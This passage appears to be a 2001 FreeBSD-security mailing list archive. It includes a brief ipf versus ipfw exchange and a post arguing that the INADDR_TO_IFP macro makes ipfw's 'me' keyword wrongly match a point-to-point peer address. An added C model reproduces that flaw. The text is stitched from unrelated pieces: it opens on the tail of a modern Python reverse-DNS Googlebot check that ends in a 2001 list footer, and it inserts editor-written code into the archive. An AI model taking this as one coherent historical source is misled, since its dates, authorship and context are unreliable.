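def fake_a(name: str) -> List[str]:
    return FAKE_A[name]


if __name__ == "__main__":
    for a in ("216.239.46.1", "198.51.100.9", "198.51.100.10", "203.0.113.5"):
        print(a, fcrdns(a, ("googlebot.com",), fake_ptr, fake_a)["reason"])
```

Against live DNS, call fcrdns(addr, ("googlebot.com",)) with the default resolvers; with the constructed tables, only 216.239.46.1 passes, the address whose PTR names a Google host that does not resolve back fails the forward step, and the look-alike domain is forward-confirmed but still untrusted.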
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 15:59:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id 049CF37B403 for ; Fri, 29 Jun 2001 15:59:30 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 5BB2C2EEB; Fri, 29 Jun 2001 15:59:16 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id PAA15697; Fri, 29 Jun 2001 15:59:16 -0700 From: appleseed@hushmail.com Message-Id: <200106292259.PAA15697@user7.hushmail.com> Date: Fri, 29 Jun 2001 16:00:09 -0500 (PDT) Cc: freebsd-security@FreeBSD.ORG To: Peter Pentchev Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz Content-type: text/plain >Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4) >and ipfw(8) :) Uhm. So what? 
Ipf > ipfw ;-)

northern_

Free, encrypted, secure Web-based email at www.hushmail.com --Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 16:25:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id CE7B937B401 for ; Fri, 29 Jun 2001 16:25:10 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 3941 invoked by uid 1000); 29 Jun 2001 23:29:36 -0000 Date: Sat, 30 Jun 2001 02:29:36 +0300 From: Peter Pentchev To: appleseed@hushmail.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: What is ipfw telling me ? Message-ID: <20010630022936.E887@ringworld.oblivion.bg> Mail-Followup-To: appleseed@hushmail.com, freebsd-security@FreeBSD.ORG References: <200106292259.PAA15697@user7.hushmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106292259.PAA15697@user7.hushmail.com>; from appleseed@hushmail.com on Fri, Jun 29, 2001 at 04:00:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Fri, Jun 29, 2001 at 04:00:09PM -0500, appleseed@hushmail.com wrote:
> >Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4)
> >and ipfw(8) :)
> Uhm. So what? Ipf > ipfw ;-)

In some respects, probably. Your statement, though, seemed to imply that ipfw was not capable of keeping track of state, and ipf was. That's what I tried to correct.

G'luck,
Peter

-- 
If there were no counterfactuals, this sentence would not have been paradoxical.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 16:29:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id B797D37B403 for ; Fri, 29 Jun 2001 16:29:31 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 109DD2F97; Fri, 29 Jun 2001 16:29:18 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id QAA18193; Fri, 29 Jun 2001 16:29:18 -0700 From: appleseed@hushmail.com Message-Id: <200106292329.QAA18193@user7.hushmail.com> Date: Fri, 29 Jun 2001 16:29:52 -0500 (PDT) Cc: freebsd-security@FreeBSD.ORG To: Peter Pentchev Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_saCIrLnOYCavFxdulvzcMGcmEXkwVrkM" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_saCIrLnOYCavFxdulvzcMGcmEXkwVrkM Content-type: text/plain >In some respects, probably. Your statement, though, seemed to imply >that ipfw was not able of keeping track of state, and ipf was. >That's what I tried to correct. Nah, I knew what u meant. I was just messing with u ;-). Ipf is just my personal preference. 
northern_

From owner-freebsd-security Sat Jun 30 04:01:28 2001
Date: Sat, 30 Jun 2001 19:01:39 +0800
From: Igor Podlesny
Organization: Morning Network
Message-ID: <1595443006.20010630190139@morning.ru>
To: freebsd-security@FreeBSD.ORG
Subject: Flight of the rat, living wreck.....

Hello everybody!

This relates to 4.3 only, so far ;) so if you're using something older you can skip it easily.

How it was started
------------------

For a long time I've been looking forward (and even trying to learn FreeBSD internals well enough to implement it myself :) to the newly implemented ipfw feature allowing easy filtering of non-transit IP packets, i.e., packets whose destination address is the address of one of the interfaces. (You know, in Linux it is done now with netfilter, which separates the IP flow into 3 different chains, and BSDi's ipfw, which looks like a programming language :), has allowed such things for ages, if I'm not mistaken ;).
In short, the feature is cool, and I got ready to start using it. At first it seemed to be okay, I felt a security comparable to "deny ip from any to any" ;)), but then I noticed that something was going wrong. And this was with point-to-point interfaces. Everything was as if the remote peer's IP address matched 'me'. That's certainly wrong as far as I can guess, so after applying fixes to my IPFW rules, allowing packets to such addresses to pass, I started digging into the code. ip_fw.c looks okay:

> if (f->fw_flg & IP_FW_F_SME) {
>         INADDR_TO_IFP(src_ip, tif);
>         if (tif == NULL)
>                 continue;
> }
> if (f->fw_flg & IP_FW_F_DME) {
>         INADDR_TO_IFP(dst_ip, tif);
>         if (tif == NULL)
>                 continue;

but in_var.h, with its INADDR_TO_IFP definition, which is the core of the 'me' feature, doesn't:

> /*
>  * Macro for finding the interface (ifnet structure) corresponding to one
>  * of our IP addresses.
>  */
> #define INADDR_TO_IFP(addr, ifp) \
>         /* struct in_addr addr; */ \
>         /* struct ifnet *ifp; */ \
> { \
>         register struct in_ifaddr *ia; \
> \
>         for (ia = in_ifaddrhead.tqh_first; \
// so here we start looking through the queue
>             ia != NULL \
// sanity (I'd have written just (ia))
>             && ((ia->ia_ifp->if_flags & IFF_POINTOPOINT)? \
// hm. special case if the interface is PTP
>                 IA_DSTSIN(ia):IA_SIN(ia))->sin_addr.s_addr != (addr).s_addr; \
// so it is like: if it is PTP, then we're using the DST address in the comparison
// with addr.s_addr
// it is at this point that I started to ask myself why it is so? why are we (ok,
// they) checking for the remote IP address if the head comment
// says:
// * Macro for finding the interface (ifnet structure) corresponding to one
// * of our IP addresses.
//      ^^^
>             ia = ia->ia_link.tqe_next) \
>                 continue; \
// as can be seen, the algorithm is: checking the addresses of our ifaces, or of
// our remote ends in the case of PTP, until we get a match or reach the end
// the next part is like the vice versa: looking through the queue for an exact
// match, and only in case ia is NULL after the first search. Also, it
// takes into consideration only PTP interfaces and only their local
// addresses.
>         if (ia == NULL) \
>                 for (ia = in_ifaddrhead.tqh_first; \
>                     ia != NULL; \
>                     ia = ia->ia_link.tqe_next) \
>                         if (ia->ia_ifp->if_flags & IFF_POINTOPOINT && \
>                             IA_SIN(ia)->sin_addr.s_addr == (addr).s_addr) \
>                                 break; \
// the terminator: if we have found something we come up with
// ia_ifp, or with NULL at least.
>         (ifp) = (ia == NULL) ? NULL : ia->ia_ifp; \
> }

Now, getting down to IPFW's 'me'-keyword business: IMHO, it breaks the sense in this way: on the first pass of the loop the match is found and ia isn't NULL, so the second one is skipped, and we get a match although we shouldn't. I deem this wrong.

Now, in conclusion
------------------

I'm a man who hasn't very deep knowledge of the BSD's bones, still learning it. So I can't say that the INADDR_TO_IFP code is completely wrong, because of my lack of knowledge, and all I say is just that it doesn't fit the purpose of IPFW's 'me' keyword and the solution is to avoid using it there.

Your ideas and opinions are really appreciated.

Good luck everybody and thank you in advance.

-- 
Best regards,
Igor                          mailto:poige@morning.ru
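Added example (written by the editor; it is neither part of Igor's post nor FreeBSD source code): a small C model of the two passes that INADDR_TO_IFP() makes over the in_ifaddr list, run against a constructed interface table with one Ethernet interface and one point-to-point interface, next to the local-address-only lookup that a 'me' rule actually needs. It reproduces the behaviour the post describes: the first pass compares a point-to-point interface's destination (peer) address, so a packet addressed to the peer, which is transit traffic, satisfies the IP_FW_F_DME test. The interface names, addresses and flag value are made up for the illustration; byte order and the real in_ifaddr/ifnet structures are ignored.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Model of FreeBSD 4.3's INADDR_TO_IFP() versus a local-address-only lookup.
 * Added illustration, not kernel code: the interface table is constructed,
 * addresses are host-order uint32_t, and IFF_POINTOPOINT is just a flag bit. */

#define IFF_POINTOPOINT 0x10

#define IPV4(a, b, c, d) \
    (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | ((uint32_t)(c) << 8) | (uint32_t)(d))

/* Stand-in for struct in_ifaddr: IA_SIN() is our address, IA_DSTSIN() the
 * peer's address (meaningful only on point-to-point interfaces). */
struct ifaddr_model {
    const char *ifname;
    unsigned    if_flags;
    uint32_t    local;   /* IA_SIN(ia)->sin_addr    */
    uint32_t    dst;     /* IA_DSTSIN(ia)->sin_addr */
};

/* Constructed in_ifaddrhead: one Ethernet interface, one PPP-style tunnel. */
static const struct ifaddr_model in_ifaddrhead[] = {
    { "fxp0", 0,               IPV4(192, 0, 2, 1), 0 },
    { "tun0", IFF_POINTOPOINT, IPV4(10, 0, 0, 1),  IPV4(10, 0, 0, 2) },
};
#define NIFA (sizeof in_ifaddrhead / sizeof in_ifaddrhead[0])

/* Same two passes as INADDR_TO_IFP(): pass one compares the *destination*
 * address on PTP interfaces; pass two, reached only if pass one found
 * nothing, compares the local address of PTP interfaces. */
static const struct ifaddr_model *inaddr_to_ifp(uint32_t addr)
{
    size_t i;
    for (i = 0; i < NIFA; i++) {
        const struct ifaddr_model *ia = &in_ifaddrhead[i];
        uint32_t cmp = (ia->if_flags & IFF_POINTOPOINT) ? ia->dst : ia->local;
        if (cmp == addr)
            return ia;            /* the macro's first loop stops here */
    }
    for (i = 0; i < NIFA; i++) {
        const struct ifaddr_model *ia = &in_ifaddrhead[i];
        if ((ia->if_flags & IFF_POINTOPOINT) && ia->local == addr)
            return ia;
    }
    return NULL;
}

/* What a 'me' rule wants: is addr one of *our* configured addresses? */
static const struct ifaddr_model *local_addr_to_ifp(uint32_t addr)
{
    size_t i;
    for (i = 0; i < NIFA; i++)
        if (in_ifaddrhead[i].local == addr)
            return &in_ifaddrhead[i];
    return NULL;
}

/* ipfw's IP_FW_F_DME test as in 4.3: the rule matches iff tif != NULL. */
int dst_is_me_ipfw43(uint32_t dst_ip)     { return inaddr_to_ifp(dst_ip) != NULL; }
/* Same test, but only our own addresses count. */
int dst_is_me_local_only(uint32_t dst_ip) { return local_addr_to_ifp(dst_ip) != NULL; }

int main(void)
{
    const struct { const char *what; uint32_t a; } probe[] = {
        { "192.0.2.1    (our fxp0 address)", IPV4(192, 0, 2, 1) },
        { "10.0.0.1     (our tun0 address)", IPV4(10, 0, 0, 1) },
        { "10.0.0.2     (tun0 peer)",        IPV4(10, 0, 0, 2) },
        { "198.51.100.7 (unrelated)",        IPV4(198, 51, 100, 7) },
    };
    size_t i;
    for (i = 0; i < sizeof probe / sizeof probe[0]; i++)
        printf("%-34s INADDR_TO_IFP: %-3s local-only: %s\n", probe[i].what,
               dst_is_me_ipfw43(probe[i].a) ? "me" : "no",
               dst_is_me_local_only(probe[i].a) ? "me" : "no");
    return 0;
}
```

Compile with `cc -o me_model me_model.c && ./me_model`. The line for 10.0.0.2 is the one that matters: under the 4.3 macro the tun0 peer is reported as 'me', so a rule such as "allow ip from any to me" on a router with that tunnel also admits packets that are merely being forwarded to the peer, which is exactly what the post observed. The local-only lookup is there to show the check a 'me' rule needs; it is not a proposed kernel patch.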